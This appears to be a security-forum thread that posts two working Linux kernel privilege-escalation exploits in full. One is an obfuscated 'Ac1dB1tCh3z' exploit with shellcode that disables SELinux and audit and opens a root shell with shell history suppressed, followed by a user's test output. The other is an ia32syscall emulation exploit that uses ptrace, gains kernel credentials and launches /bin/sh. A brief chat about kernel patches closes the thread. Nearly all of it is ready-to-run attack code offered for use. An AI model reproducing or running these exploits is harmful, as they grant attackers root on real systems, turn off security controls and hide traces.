*/ #define RJMPDDTGR_OFF_IDT 14 #define RJMPDDTGR_DYHHTSFDARE 8 #define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27 static char ruujhdbgatrfe345[]= "\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00" "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0" "\x0f\x01\xf8" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x48\xcf"; #define CJE_4554TFFDTRMAJHD_OFF 10 #define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23 static char dis4blens4sel1nuxhayettgdr64545[]= "\x41\x52\x50" "\xb8\x00\x00\x00\x00" "\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x89\x02" "\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42" "\x41\x89\x02" "\x58\x41\x5a"; /* rhel LSM stuffs */ #define RHEL_LSM_OFF 98 struct LSM_rhel { __yyrhdgdtfs66ytgetrfd selinux_ops; __yyrhdgdtfs66ytgetrfd capability_ops; __yyrhdgdtfs66ytgetrfd dummy_security_ops; __yyrhdgdtfs66ytgetrfd selinux_enforcing; __yyrhdgdtfs66ytgetrfd audit_enabled; const char *krelease; const char *kversion; }; struct LSM_rhel known_targets[4]= { { 0xffffffff8031e600ULL, 0xffffffff8031fec0ULL, 0xffffffff804acc00ULL, 0xffffffff804af960ULL, 0xffffffff8049b124ULL, "2.6.18-164.el5", "#1 SMP Thu Sep 3 03:28:30 EDT 2009" // to manage minor/bug fix changes }, { 0xffffffff8031f600ULL, 0xffffffff80320ec0ULL, 0xffffffff804afc00ULL, 0xffffffff804b2960ULL, 0xffffffff8049e124ULL, "2.6.18-164.11.1.el5", "#1 SMP Wed Jan 6 13:26:04 EST 2010" }, { 0xffffffff805296a0ULL, 0xffffffff8052af60ULL, 0xffffffff806db1e0ULL, 0xffffffff806ddf40ULL, 0xffffffff806d5324ULL, "2.6.18-164.11.1.el5xen", "#1 SMP Wed Jan 20 08:06:04 EST 2010" // default xen }, { 0xffffffff8031f600ULL,// d selinux_ops 0xffffffff80320ec0ULL,// d capability_ops 0xffffffff804afc00ULL,// B dummy_security_ops 0xffffffff804b2960ULL,// B selinux_enforcing 0xffffffff8049e124ULL,// B audit_enabled "2.6.18-164.11.1.el5", "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire 
target LoL } }; static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt; struct socketcallAT { int s; int level; int optname; void *optval; volatile socklen_t *optlen; }__attribute__((packed)); struct idt64from32_s { unsigned short limit; unsigned long base; }__attribute__((packed)); static __yyrhdgdtfs66ytgetrfd getidt() { struct idt64from32_s idt; memset(&idt, 0x00, sizeof(struct idt64from32_s)); asm volatile("sidt %0" : "=m"(idt)); return idt.base | 0xFFFFFFFF00000000ULL; } static int isSelinuxEnabled() { FILE *selinux_f; selinux_f = fopen(SELINUX_PATH, "r"); if(selinux_f == NULL) { if(errno == EPERM) return 1; else return 0; } fclose(selinux_f); return 1; } static int wtfyourunhere_heee(char *out_release, char* out_version) { int ret; const char*ptr; int count=0; char r[32], *bptr; struct utsname buf; ret = uname(&buf); if(ret < 0) return -1; strcpy(out_release, buf.release); strcpy(out_version, buf.version); ptr = buf.release; bptr = r; memset(r, 0x00, sizeof(r)); while(*ptr) { if(count == 2) { if(*ptr >= '0' && *ptr <= '9') *bptr++ = *ptr; else break; } if(*ptr == '.') count++; ptr++; } if(strlen(r) < 1 || !atoi(r)) return -1; return atoi(r); } static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table) { *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing; *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled; __dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); __dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); } static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag) { FILE *ka; char line[512]; char reloc_a[64]; char reloc[64]; if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag) return 0; ka = fopen(filename, 
"r"); if(!ka) return 0; while(fgets(line, 512, ka) != NULL) { char *l_p = line; char *ra_p = reloc_a; char *r_p = reloc; memset(reloc, 0x00, sizeof(reloc)); memset(reloc_a, 0x00, sizeof(reloc_a)); while(*l_p != ' ' && (ra_p - reloc_a) < 64) *ra_p++ = *l_p++; l_p += 3; while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64) *r_p++ = *l_p++; if(!strcmp(reloc, s)) { __gggdfstsgdt_dddex("$$$ %s->%s\n", s, reloc_a); return strtoull(reloc_a, NULL, 16); } } return 0; } static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s) { return get_sym_ex(s, KALLSYMS, 0); } static int parse_cred(const char* val) { int i=0; const char* p = val; char local[64], *l; for(i=0; i<3; i++) { memset(local, 0x00, sizeof(local)); l = local; while(*p && *p != ',') *l++ = *p++; if(!(*p) && i != 2) return -1; _m_cred[i] = strtoull(local, NULL, 16); p++; } return 0; } #define SELINUX_OPS "selinux_ops" #define DUMMY_SECURITY_OPS "dummy_security_ops" #define CAPABILITY_OPS "capability_ops" #define SELINUX_ENFORCING "selinux_enforcing" #define AUDIT_ENABLED "audit_enabled" struct LSM_rhel *lsm_rhel_find_target(int check_rhel) { int i; char mapbuf[128]; struct LSM_rhel *lsm = &(known_targets[0]); if(check_rhel && !isRHHGDPPLADSF(krelease)) { __pppp_tegddewyfg("!!! N0t a RH3l k3rn3l \n"); return NULL; } __pppp_tegddewyfg("$$$ L00k1ng f0r kn0wn t4rg3tz.. \n"); for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++) { if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion)) { __gggdfstsgdt_dddex("$$$ Th1z b1tch 1z t0azt. 
kn0wn t4rg3t: %s %s \n", lsm->krelease, lsm->kversion); return lsm; } } __pppp_tegddewyfg("$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...\n"); strcpy(mapbuf, "/boot/System.map-"); strcat(mapbuf, krelease); dyn4nt4n1labeggeyrthryt.selinux_ops = get_sym_ex(SELINUX_OPS, mapbuf, 1); dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1); dyn4nt4n1labeggeyrthryt.capability_ops = get_sym_ex(CAPABILITY_OPS, mapbuf, 1); dyn4nt4n1labeggeyrthryt.selinux_enforcing = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1); dyn4nt4n1labeggeyrthryt.audit_enabled = get_sym_ex(AUDIT_ENABLED, mapbuf, 1); if(!dyn4nt4n1labeggeyrthryt.selinux_ops || !dyn4nt4n1labeggeyrthryt.dummy_security_ops || !dyn4nt4n1labeggeyrthryt.capability_ops || !dyn4nt4n1labeggeyrthryt.selinux_enforcing || !dyn4nt4n1labeggeyrthryt.audit_enabled) return NULL; return &dyn4nt4n1labeggeyrthryt; } static void put_your_hands_up_hooker(int argc, char *argv[]) { int fd,ver,ret; char __b[16]; fd = open(KALLSYMS, O_RDONLY); ret = read(fd, __b, 16); // dummy read if((fd >= 0 && ret > 0)) { __pppp_tegddewyfg("$$$ Kallsyms +r\t\n"); // d0nt p4tch m3 br0 flags |= KERN_HHSYPPLORQTWGFD; } close(fd); ver = wtfyourunhere_heee(krelease, kversion); if(ver < 0) __yyy_tegdtfsrer("!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!\n"); __gggdfstsgdt_dddex("$$$ K3rn3l r3l3as3: %s\n", krelease); if(argc != 1) { while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0) { switch(ret) { case 'i': flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS; useidt=1; // u have to use -i to force IDT Vector break; case 'f': flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT; break; case 'l': flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS; break; case 'c': if(!optarg || parse_cred(optarg) < 0) __yyy_tegdtfsrer("!!! Un4bl3 t0 p4s3 cr3d c0d3z\n"); break; case 'k': if(optarg) _m_fops = strtoull(optarg, NULL, 16); else __yyy_tegdtfsrer("!!! 
Un4bl3 t0 p4rs3 f0P numb3rs\n"); break; case 's': if(!isSelinuxEnabled()) __pppp_tegddewyfg("??? wh4t th3 fuq s3l1nux 1z n0t 3v3n 3n4bl3d!?\n"); else flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX; break; case 'o': if(optarg) _m_cpu_off = strtoull(optarg, NULL, 16); else __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n"); break; } } } if(ver >= 29) // needs cred structure { flags |= KERN_DGGDYDTEGGETFDRLAK; if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) { _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD); _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD); _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD); } if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) { __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n"); } __pppp_tegddewyfg("$$$ Kernel Credentials detected\n"); *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0]; *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1]; *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2]; } if(ver >= 30) // needs cpu offset { flags |= KERN_DHHDYTMLADSFPYT; if(!_m_cpu_off) _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765); if(!_m_cpu_off) __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n"); __pppp_tegddewyfg("$$$ K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n"); *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off; *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off; } } static void env_prepare(int argc, char* argv[]) { put_your_hands_up_hooker(argc, argv); if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS)) // try fops { __pppp_tegddewyfg("??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d\n"); if(!_m_fops) _m_fops = get_sym(RW_FOPS); /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO * Thanks to the guy who killed this vector... 
you know who you are:) * Lucky for you, there are more:) */ if(_m_fops) { usefops=1; __pppp_tegddewyfg("$$$ w34p0n 0f ch01c3: F0PZzZzzz\n"); } } if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) // try lsm(rhel) { curr_target = lsm_rhel_find_target(1); if(!curr_target) { __pppp_tegddewyfg("!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n"); } else uselsm=1; } if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) { // -i flag curr_target = lsm_rhel_find_target(0); if(!curr_target) { __pppp_tegddewyfg("!!! Un4lb3 t0 f1nd t4rg3t: c0ntinu3 w1th0ut s3linsux d1s4bl3.\n"); /* remove Selinux Flag */ flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX; } } if(!usefops && !useidt && !uselsm) __yyy_tegdtfsrer("!!! 3v3ryth3ng f41l3d!!*@&^@&*^ () * try an0th3r 0d4y L0l\n"); } static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack) { int socklen_l = 8 + stack - addr - 16; return socklen_l; } static struct socketcallAT at; static __dgdhdytrg55 idtover[4] = {0x00100000UL, 0x0020ee00UL, 0x00000000UL, 0x00000000UL}; static void fillsocketcallAT() { at.s = s; at.level = SOL_IP; at.optname = MCAST_MSFILTER; at.optval = buffer; at.optlen = &magiclen; } static void bitch_call(struct socketcallAT *at, void *stack) { asm volatile( "push %%ebx\t\n" "push %%esi\t\n" "push %%ecx\t\n" "push %%edx\t\n" "movl $0x66, %%eax\t\n" "movl $0xf, %%ebx\t\n" "movl %%esp, %%esi\t\n" "movl %0, %%ecx\t\n" "movl %1, %%esp\t\n" "int $0x80\t\n" "movl %%esi, %%esp\t\n" "pop %%edx\t\n" "pop %%ecx\t\n" "pop %%esi\t\n" "pop %%ebx\t\n" : : "r"(at), "r"(stack) : "memory", "eax", "ecx", "ebx", "esi" ); } static void __setmcbuffer(__dgdhdytrg55 value) { int i; __dgdhdytrg55 *p = (__dgdhdytrg55*)buffer; for(i=0; i<sizeof(buffer)/sizeof(void*); i++) *(p+i) = value; } static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase) { int i; __dgdhdytrg55 curr; for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++) { curr = idtover[i]; __setmcbuffer(curr); magiclen = get_socklen(idtbase + (i*4), 
Y0Y0STOP); bitch_call(&at, (void*)Y0Y0STOP); } } static void y0y0stack() { void* map = mmap((void*)Y0Y0SMAP, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1,0); if(MAP_FAILED == map) __xxxfdgftr_hshsgdt("mmap"); } static void y0y0code() { void* map = mmap((void*)Y0Y0CMAP, PAGE_SIZE, #ifdef TRY_REMAP_DEFAULT PROT_READ|PROT_WRITE, #else PROT_READ|PROT_WRITE|PROT_EXEC, #endif MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1,0); if(MAP_FAILED == map) __xxxfdgftr_hshsgdt("mmap"); } static int rey0y0code(unsigned long old) { int fd; void *map; volatile char wizard; char cwd[1024]; getcwd(cwd, sizeof(cwd)); strcat(cwd, "/__tmpfile"); unlink(cwd); fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU); if(fd < 0) return -1; write(fd, (const void*)old, PAGE_SIZE); if(munmap((void*)old, PAGE_SIZE) < 0) return -1; map = mmap((void*)old, PAGE_SIZE, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, fd,0); if(map == MAP_FAILED) return -1; /* avoid lazy page fault handler * Triple Fault when using idt vector * and no pages are already mapped:) */ wizard = *((char*)old); unlink(cwd); return wizard; } int main(int argc, char*argv[]) { int uid,fd; __yyrhdgdtfs66ytgetrfd *patch, idtb; struct pollfd pfd; printf(BANNER); uid = getuid(); env_prepare(argc, argv); y0y0stack(); y0y0code(); if(useidt) { idtb = getidt(); __gggdfstsgdt_dddex("$$$ h0m3 b4s3 addr3ss: %llx\n", idtb); __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - IDT m3th34d\n"); patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT); *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T); __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n"); if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX) { __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n"); p4tch_sel1nux_codztegfaddczda(curr_target); } __dhdyetgdfstreg__((void*)J0J0S, ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345)); } else if(usefops || uselsm) { __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d\n"); 
patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF); *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T); __setmcbuffer(J0J0S); __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n"); if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) { __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n"); p4tch_sel1nux_codztegfaddczda(curr_target); } __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0)); } /* set shellcode level 2 */ if(flags & KERN_DGGDYDTEGGETFDRLAK) { __pppp_tegddewyfg("$$$ Us1ng cr3d s3ash3llc0d3z\n"); __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr)); } else { __pppp_tegddewyfg("$$$ Us1ng st4nd4rd s3ash3llz\n"); __dhdyetgdfstreg__((void*)J0J0R00T, ttrg0ccc, sizeof(ttrg0ccc)); *((unsigned int*)(J0J0R00T + R0C_0FF)) = uid; } __pppp_tegddewyfg("$$$ 0p3n1ng th3 m4giq p0rt4l\n"); s = socket(AF_INET, SOCK_DGRAM, 0); if(s < 0) __xxxfdgftr_hshsgdt("socket"); fillsocketcallAT(); #ifdef TRY_REMAP_DEFAULT if(rey0y0code(Y0Y0CMAP) < 0) __yyy_tegdtfsrer("!!! Un4bl3 t0 r3m4p sh1t\t\n"); #endif if(useidt) { __yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd); __gggdfstsgdt_dddex("$$$ Us1ng 1dt 3ntry: %d\n", 0xdd); idt_smash((idtentry)); sleep(1); asm volatile("int $0xdd\t\n"); } else if(usefops) { magiclen = get_socklen(_m_fops, Y0Y0STOP); magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd); __gggdfstsgdt_dddex("$$$ m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen); __pppp_tegddewyfg("$$$ 0v3r thr0w f0ps g0v3rnm3nt\n"); bitch_call(&at, (void*)Y0Y0STOP); sleep(1); fd = open(TMAGIC_66TDFDRTS, O_RDONLY); if(fd < 0) __xxxfdgftr_hshsgdt("!!! 
fuq t1m3r_l1st"); pfd.fd = fd; pfd.events = POLLIN | POLLOUT; poll(&pfd, 1, 0); } else if(uselsm) { int msqid; __yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF); __yyrhdgdtfs66ytgetrfd dummy_msg_off = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF); __yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF); msqid = msgget(0, IPC_PRIVATE|0600); if(msqid < 0) __xxxfdgftr_hshsgdt("!!! fuqqqqqq msgg3t"); magiclen = get_socklen(selinux_msg_off, Y0Y0STOP); __setmcbuffer(J0J0S); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP); __setmcbuffer(0); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(dummy_msg_off, Y0Y0STOP); __setmcbuffer(J0J0S); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(dummy_msg_off+4, Y0Y0STOP); __setmcbuffer(0); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(capability_msg_off, Y0Y0STOP); __setmcbuffer(J0J0S); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(capability_msg_off+4, Y0Y0STOP); __setmcbuffer(0); bitch_call(&at, (void*)Y0Y0STOP); msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it } munmap((void*)Y0Y0CMAP, PAGE_SIZE); /* exec */ if(getuid() == 0) { pid_t pid; __pppp_tegddewyfg("$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP\n"); pid = fork(); if(pid == 0) { char *args[] = {"/bin/sh", "-i", NULL}; char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0", "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL }; execve("/bin/sh", args, envp); } else { int status; waitpid(pid, &status, 0); } } else __pppp_tegddewyfg("!!! y0u fuq1ng f41l. 
g3t th3 fuq 0ut!\n"); close(s); return 0; } #endif // -m32

Result on 2.6.34.4-0.1-default (out of boredom):

nytro@rst[/home/nytro/Documents]: ./test
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.34.4-0.1-default
$$$ prepare_creds->c02647b0
$$$ override_creds->c02645b0
$$$ revert_creds->c0264750
$$$ Kernel Credentials detected
!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z
nytro@rst[/home/nytro/Documents]:
-
x86_64 Linux Kernel ia32syscall Emulation Privilege Escalation

Something about it: http://rstcenter.com/forum/25902-die-hard-bug-bytes-linux-kernel-second-time.rst

/*
 * exploit for x86_64 linux kernel ia32syscall emulation (again)
 * rediscovered by ben hawkes
 * with help from robert swiecki and tavis ormandy
 *
 * original vulnerability discovered by Wojciech Purczynski
 *
 * original exploit by
 * Robert Swiecki <robert_at_swiecki.net>
 * Przemyslaw Frasunek <venglin_at_freebsd.lublin.pl>
 * Pawel Pisarczyk <pawel_at_immos.com.pl>
 *
 * kernel priv escalation code borrowed from spender
 *
 */

#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <inttypes.h>
#include <sys/reg.h>
#include <signal.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <string.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

/* runs in ring 0 once the bogus syscall entry is taken */
int kernelmodecode(void *file, void *vma)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

/* resolve a kernel symbol from /proc/kallsyms (or the old /proc/ksyms layout) */
unsigned long get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    int ret = 0, oldstyle = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            return 0;
        oldstyle = 1;
    }

    while (ret != EOF) {
        if (!oldstyle) {
            ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
        } else {
            ret = fscanf(f, "%p %s\n", (void **) &addr, sname);
            if (ret == 2) {
                char *p;
                if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
                    continue;
                }
                p = strrchr(sname, '_');
                if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_') {
                        p--;
                    }
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            printf("resolved symbol %s to %p\n", name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);
    return 0;
}

static void docall(uint64_t *ptr, uint64_t size)
{
    commit_creds = (_commit_creds) get_symbol("commit_creds");
    if (!commit_creds) {
        printf("symbol table not available, aborting!\n");
        exit(1);
    }

    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
    if (!prepare_kernel_cred) {
        printf("symbol table not available, aborting!\n");
        exit(1);
    }

    uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);
    printf("mapping at %lx\n", tmp);
    if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
             MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
        printf("mmap fault\n");
        exit(1);
    }

    for (; (uint64_t) ptr < (tmp + size); ptr++)
        *ptr = (uint64_t)kernelmodecode;

    __asm__("\n"
    "\tmovq $0x101, %rax\n"
    "\tint $0x80\n");

    printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
    execl("/bin/sh", "bin/sh", NULL);
    printf("no /bin/sh ??\n");
    exit(0);
}

int main(int argc, char **argv)
{
    int pid, status, set = 0;
    uint64_t rax;
    uint64_t kern_s = 0xffffffff80000000;
    uint64_t kern_e = 0xffffffff84000000;
    uint64_t off = 0x0000000800000101 * 8;

    if (argc == 4) {
        docall((uint64_t*)(kern_s + off), kern_e - kern_s);
        exit(0);
    }

    if ((pid = fork()) == 0) {
        ptrace(PTRACE_TRACEME, 0, 0, 0);
        execl(argv[0], argv[0], "2", "3", "4", NULL);
        perror("exec fault");
        exit(1);
    }

    if (pid == -1) {
        printf("fork fault\n");
        exit(1);
    }

    for (;;) {
        if (wait(&status) != pid)
            continue;
        if (WIFEXITED(status)) {
            printf("Process finished\n");
            break;
        }
        if (!WIFSTOPPED(status))
            continue;
        if (WSTOPSIG(status) != SIGTRAP) {
            printf("Process received signal: %d\n", WSTOPSIG(status));
            break;
        }
        rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
        if (rax == 0x000000000101) {
            if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                printf("PTRACE_POKEUSER fault\n");
                exit(1);
            }
            set = 1;
            //rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
        }
        if ((rax == 11) && set) {
            ptrace(PTRACE_DETACH, pid, 0, 0);
            for (;;)
                sleep(10000);
        }
        if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
            printf("PTRACE_SYSCALL fault\n");
            exit(1);
        }
    }
    return 0;
}
-
If you can help, why don't you post here so you can help more people?
-
Yes, the Ubuntu people probably fix such (trivial) problems and keep them only for themselves. Which means they are rude. They hardly contribute to the kernel at all; they are a kind of leechers. Anyway, before compiling, I selected almost all the options, to check where errors or warnings appear. And on the latest version I got a fatal error, but I didn't have time to look into what it was about; school has started. I'll come back with a few more such bugfixes, then who knows, maybe I'll learn something more and move on. Edit: For those warnings (xfs_alloc.c) the patch has appeared: http://www.kernel.org/diff/diffview.cgi?file=%2Fpub%2Flinux%2Fkernel%2Fv2.6%2Fnext%2Fpatch-v2.6.36-rc4-next-20100917.bz2;z=3819